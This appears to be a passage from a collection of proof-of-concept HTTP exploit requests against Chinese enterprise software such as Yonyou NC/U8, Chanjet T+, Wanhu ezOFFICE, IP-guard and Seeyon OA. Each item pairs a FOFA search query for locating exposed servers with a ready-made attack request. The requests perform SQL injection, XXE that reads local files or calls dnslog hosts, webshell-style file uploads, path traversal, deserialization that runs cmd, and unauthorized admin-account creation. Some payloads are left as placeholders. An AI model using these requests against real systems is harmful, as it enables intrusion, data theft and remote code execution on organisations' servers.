User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


33. Yonyou NC downTax/download SQL injection
version:NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


34. Yonyou NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--


36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a


37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>


38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>


39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--


40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>


41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close


42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD


http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>


44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest


46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close


48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
1231
Content-Type: application/octet-stream
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"
upload
------269520967239406871642430066855--


49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--


http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1


51. Yunshikong (云时空) social commerce ERP system validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333


53. DPtech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd


54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request to the target; it executes a command that writes the given string into the given file
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"


Full request
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
"storeID":{
 "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
 "MethodName":"Start",
  "ObjectInstance":{
   "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
    "StartInfo":{
   "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
    "FileName":"cmd",
    "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
    }
  }
  }
}


Step 2: visit the following URL
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt


55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie via the interface
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: use the obtained Cookie to request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers


56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
   "MethodName":"Start",
    "ObjectInstance":{
       "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "StartInfo": {
           "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
           "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
       }
    }
  }
}


57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. 百卓 Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特 customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚 management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. 优卡特 脸爱云 一脸通 smart management platform 1.0.55.0.0.1 authorization bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The string 6cfe798ba8e5b85feb50164c59f4bec9 appearing on lines 42 and 43 of the response confirms the vulnerability.

67. 万户 ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters set the name of the file to be written, dir sets the directory it is written to, and fileType sets the file extension.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. 万户 ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. 万户 ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. 万户 ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 1670

__VIEWSTATE=PAYLOAD

71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. 致远 OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
